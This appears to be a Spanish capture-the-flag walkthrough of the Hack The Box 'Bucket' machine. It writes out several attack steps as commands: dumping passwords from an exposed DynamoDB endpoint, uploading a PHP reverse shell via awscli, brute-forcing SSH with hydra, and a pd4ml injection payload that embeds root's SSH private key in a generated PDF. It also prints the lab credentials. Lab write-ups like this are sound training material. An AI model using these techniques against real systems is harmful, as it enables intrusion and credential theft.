# Bucket

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen
- Amazon AWS
- Dynamodb
- Upload shell Amazon AWS (awscli)
- Hydra ssh
- PDF Attachments

## Nmap Scan

`nmap -Pn -sV -sC -oN bucket.txt 10.10.10.212`

```
Nmap scan report for 10.10.10.212
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Para acceder al puerto 80 es necesario agregar el dominio **bucket.htb** a nuestro archivo **hosts**. Enumerando nos encontramos con una página web simple y podemos ver que en el source code hay un subdominio llamado **s3.bucket.htb** el cual agregamos también a nuestros hosts.

##### /etc/hosts
```
10.10.10.212    bucket.htb s3.bucket.htb
```

![1](img/1.png)

Podemos percatarnos que es un **s3** de Amazon por lo cual usaremos la herramienta **awscli** para interactuar con el servicio.

> Podemos instalar aws con el siguiente comando: \
    - sudo apt-get install awscli

Configuramos AWS y enumeramos las tablas que existen.

- `aws configure`
- `aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/`

![2](img/2.png)

Enumerando la tabla **users** obtenemos usuarios y passwords.

![3](img/3.png)

```
Mgmt: Management@#1@#
Cloudadm: Welcome123!
Sysadm: n2vM-<_K_Q:.Aa2
```

### AWS-CLI Upload shell

Los usuarios y passwords no funcionan para conectarse por SSH, después de probar más cosas con **aws-cli** es posible subir una reverse shell a la ruta **/adserver** que vimos al inicio.

Modificamos la IP del archivo **php-reverse-shell.php** y lo subimos al servidor.

- `cp /usr/share/webshells/php/php-reverse-shell.php .`
- `aws --endpoint-url=http://s3.bucket.htb/ s3 cp php-reverse-shell.php s3://adserver/`

![4](img/4.png)

Ponemos a la escucha nuestro netcat y una vez arriba el archivo podemos acceder a través de la siguiente url **http://bucket.htb/php-reverse-shell.php**.

- `nc -lvnp 1234`
- `curl http://bucket.htb/php-reverse-shell.php`

![5](img/5.png)

Se puede visualizar que existe un usuario llamado **roy**, utilizando hydra podemos validar los passwords obtenidos anteriormente.

`hydra -l roy -P pass.txt 10.10.10.212 ssh`

![6](img/6.png)

Nos conectamos por SSH.

`ssh roy@10.10.10.212`

![7](img/7.png)

## Escalada de Privilegios

Revisando los puertos locales, el 8000 se encuentra abierto.

![8](img/8.png)

En los archivos web está el directorio **/var/www/bucket-app** y haciendo una petición al puerto 8000 se visualiza el mismo contenido de los archivos en el directorio.

`curl http://127.0.0.1:8000/`

![9](img/9.png)

Checando los procesos con la herramienta **pspy** nos damos cuenta de que está limpiando cada cierto tiempo lo que se encuentra en **/var/www/bucket-app/files**.

![10](img/10.png)

Al revisar el contenido del archivo **index.php** podemos ver el código PHP.

![11](img/11.png)

### PDF Attachments

> PD4ML le permite incrustar archivos adjuntos en un archivo PDF resultante. En los escenarios más simples, la etiqueta define un icono en el que se puede hacer clic (del conjunto de iconos estándar de archivos adjuntos de PDF) y proporciona una descripción.

Después de analizar todo se puede tomar ventaja de la creación de tablas en el s3 con dynamodb y utilizar **pd4ml** para incrustar un archivo del sistema en el PDF que genera la aplicación.

Creamos nuestra tabla nueva con las características que vienen el archivo **index.php**.

```
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htb/
```

![12](img/12.png)

Agregamos nuestro payload a la tabla previamente creada.

```
aws dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url http://s3.bucket.htb/
```

![13](img/13.png)

Hacemos la petición POST al puerto web interno para generar los archivos.

`curl -v -X POST -d "action=get_alerts" http://127.0.0.1:8000/`

![14](img/14.png)

Copiamos el archivo **result.pdf** a nuestra máquina con scp.

`scp roy@10.10.10.212:/var/www/bucket-app/files/result.pdf .`

![15](img/15.png)

Al abrir el PDF se visualiza un icono el cual si le damos clic nos mostrara el archivo incrustado que en este caso es el id_rsa del usuario root.

![16](img/16.png)

Le damos permisos de lectura al archivo y nos conectamos por SSH.

- `chmod 400 root_id_rsa`
- `ssh -i root_id_rsa root@10.10.10.212`

![17](img/17.png)

## Referencias
https://docs.aws.amazon.com/cli/latest/reference/dynamodb/index.html \
https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/DynamoDB.html \
https://www.fernandomc.com/posts/eight-examples-of-fetching-data-from-dynamodb-with-node/ \
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html \
https://pd4ml.com/cookbook/pdf-attachments.htm